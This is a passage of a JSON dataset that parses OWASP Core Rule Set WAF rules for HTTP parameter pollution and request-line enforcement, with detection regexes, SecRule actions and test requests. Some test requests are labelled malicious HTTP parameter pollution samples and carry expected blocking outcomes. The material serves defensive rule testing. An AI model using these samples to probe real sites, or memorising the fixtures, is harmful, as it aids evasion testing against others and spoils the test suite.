"act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 476, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 477, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 478, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 479, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 480, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 481, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 482, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 483, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 484, "act_quote": "quotes", "act_arg": "capec/1000/152/137/15/460", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 485, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 486, "act_quote": "quotes", "act_arg": "TX.paramcounter_%{MATCHED_VAR_NAME}=+1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 473 } }, { "rule_id": "921180", "has_tests": true, "detection": { "variables": [ { "name": "TX", "part": "/paramcounter_.*/", "negated": false } ], "operator": { "type": "@gt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "message": "HTTP Parameter Pollution (%{MATCHED_VAR_NAME})", "logdata": "Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ATTACK", "capec/1000/152/137/15/460" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": "GET", "uri": "/?pineapple=pizza", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921180 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "pineapple=pizza" } ] }, { "description": "", "test_id": 2, "request": { "method": "GET", "uri": "/?pineapple=pizza&pizza=pineapple", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921180 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "pineapple=pizza&pizza=pineapple" } ] }, { "description": "", "test_id": 3, "request": { "method": "GET", "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921180 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 4, "request": { "method": "GET", "uri": "/?pineapple=pizza&pineapple=aint-pizza", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921180 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "pineapple=pizza&pineapple=aint-pizza" } ] }, { "description": "", "test_id": 5, "request": { "method": "GET", "uri": "/?pineapple=pizza&pineapple2=aint-pizza", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921180 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "pineapple=pizza&pineapple2=aint-pizza" } ] }, { "description": "query parameter repetition", "test_id": 6, "request": { "method": "GET", "uri": "/?pineapple=pizza&pineapple=aint-pizza&pineapple=is-pizza&pineapple=aint-pizza2", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921180 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "pineapple=pizza&pineapple=aint-pizza&pineapple=is-pizza&pineapple=aint-pizza2" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 488, "variables": [ { "variable": "TX", "variable_part": "/paramcounter_.*/", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@gt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 489, "act_quote": "no_quote", "act_arg": "921180", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 490, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 491, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 492, "act_quote": "quotes", "act_arg": "HTTP Parameter Pollution (%{MATCHED_VAR_NAME})", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 493, "act_quote": "quotes", "act_arg": "Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 494, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 495, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 496, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 497, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 498, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 499, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 500, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 501, "act_quote": "quotes", "act_arg": "capec/1000/152/137/15/460", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 502, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 503, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 504, "act_quote": "quotes", "act_arg": "tx.http_violation_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 505, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 488 } }, { "rule_id": "921210", "has_tests": true, "detection": { "variables": [ { "name": "ARGS_NAMES", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "(][^\\]]+$|][^\\]]+\\[)", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "message": "HTTP Parameter Pollution after detecting bogus char after parameter array", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/3", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ATTACK", "capec/1000/152/137/15/460" ] }, "test_cases": [ { "description": "HTTP Parameter Pollution via bogus chars after parameter array name", "test_id": 1, "request": { "method": null, "uri": "/?foo[1]a=bar&foo[1]b=", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "foo[1]a=bar&foo[1]b=" } ] }, { "description": "HTTP Parameter Pollution via bogus chars between square brackets of multi-dimensional array name", "test_id": 2, "request": { "method": null, "uri": "/?foo[1]a[2]=bar", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "foo[1]a[2]=bar" } ] }, { "description": "HTTP Parameter Pollution false positive test", "test_id": 3, "request": { "method": null, "uri": "/?foo[1][2]=bar", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921210 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "foo[1][2]=bar" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 530, "variables": [ { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(][^\\]]+$|][^\\]]+\\[)", "actions": [ { "act_name": "id", "lineno": 531, "act_quote": "no_quote", "act_arg": "921210", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 532, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 533, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "log", "lineno": 534, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 535, "act_quote": "quotes", "act_arg": "HTTP Parameter Pollution after detecting bogus char after parameter array", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 536, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 537, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 538, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 539, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 540, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 541, "act_quote": "quotes", "act_arg": "paranoia-level/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 542, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 543, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 544, "act_quote": "quotes", "act_arg": "capec/1000/152/137/15/460", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 545, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 546, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 547, "act_quote": "quotes", "act_arg": "tx.http_violation_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 548, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 530 } }, { "rule_id": "921017", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "4", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 552, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "4", "actions": [ { "act_name": "id", "lineno": 552, "act_quote": "no_quote", "act_arg": "921017", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 552, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 552, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 552, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 552, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 552, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 552, "act_quote": "no_quote", "act_arg": "END-REQUEST-921-PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 552 } }, { "rule_id": "921018", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "4", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 553, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "4", "actions": [ { "act_name": "id", "lineno": 553, "act_quote": "no_quote", "act_arg": "921018", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 553, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 553, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 553, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 553, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 553, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 553, "act_quote": "no_quote", "act_arg": "END-REQUEST-921-PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 553 } }, { "rule_id": "921220", "has_tests": true, "detection": { "variables": [ { "name": "ARGS_NAMES", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "\\[", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "message": "HTTP Parameter Pollution possible via array notation", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/4", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ATTACK", "capec/1000/152/137/15/460" ] }, "test_cases": [ { "description": "Potential HTTP Parameter Pollution via parameter array", "test_id": 1, "request": { "method": "GET", "uri": "/get?foo[1]=bar", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921220 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "foo[1]=bar" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 580, "variables": [ { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "\\[", "actions": [ { "act_name": "id", "lineno": 581, "act_quote": "no_quote", "act_arg": "921220", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 582, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 583, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "log", "lineno": 584, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 585, "act_quote": "quotes", "act_arg": "HTTP Parameter Pollution possible via array notation", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 586, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 587, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 588, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 589, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 590, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 591, "act_quote": "quotes", "act_arg": "paranoia-level/4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 592, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 593, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 594, "act_quote": "quotes", "act_arg": "capec/1000/152/137/15/460", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 595, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 596, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 597, "act_quote": "quotes", "act_arg": "tx.http_violation_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 598, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 580 } }, { "rule_id": "920011", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 26, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 26, "act_quote": "no_quote", "act_arg": "920011", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 26, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 26, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 26, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 26, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 26, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 26, "act_quote": "no_quote", "act_arg": "END-REQUEST-920-PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 26 } }, { "rule_id": "920012", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 27, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 27, "act_quote": "no_quote", "act_arg": "920012", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 27, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 27, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 27, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 27, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 27, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 27, "act_quote": "no_quote", "act_arg": "END-REQUEST-920-PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 27 } }, { "rule_id": "920100", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_LINE", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)^(?:get /[^#\\?]*(?:\\?[^\\s\\x0b#]*)?(?:#[^\\s\\x0b]*)?|(?:connect (?:(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\\.?(?::[0-9]+)?|[\\--9A-Z_a-z]+:[0-9]+)|options \\*|[a-z]{3,10}[\\s\\x0b]+(?:[0-9A-Z_a-z]{3,7}?://[\\--9A-Z_a-z]*(?::[0-9]+)?)?/[^#\\?]*(?:\\?[^\\s\\x0b#]*)?(?:#[^\\s\\x0b]*)?)[\\s\\x0b]+[\\.-9A-Z_a-z]+)$", "negated": true } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "Invalid HTTP Request Line", "logdata": "%{request_line}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "WARNING", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "Standard GET request", "test_id": 1, "request": { "method": "GET", "uri": "/get", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920100 ] }, "malicious_patterns": [] }, { "description": "Request has tab (\\t) before request method - Apache complains\nAH00126: Invalid URI in request GET / HTTP/1.1\n", "test_id": 2, "request": { "method": " GET", "uri": "/get", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [] }, { "description": "Perfectly valid OPTIONS request", "test_id": 3, "request": { "method": "OPTIONS", "uri": "*", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920100 ] }, "malicious_patterns": [] }, { "description": "Valid CONNECT", "test_id": 4, "request": { "method": "CONNECT", "uri": "1.2.3.4:80", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920100 ] }, "malicious_patterns": [] }, { "description": "invalid Connect request, domains require ports", "test_id": 5, "request": { "method": "CONNECT", "uri": "www.coreruleset.org", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [] }, { "description": "This is an acceptable CONNECT request for SSL tunneling", "test_id": 6, "request": { "method": "CONNECT", "uri": "www.coreruleset.org:80", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920100 ] }, "malicious_patterns": [] }, { "description": "Valid request with query and anchor components", "test_id": 7, 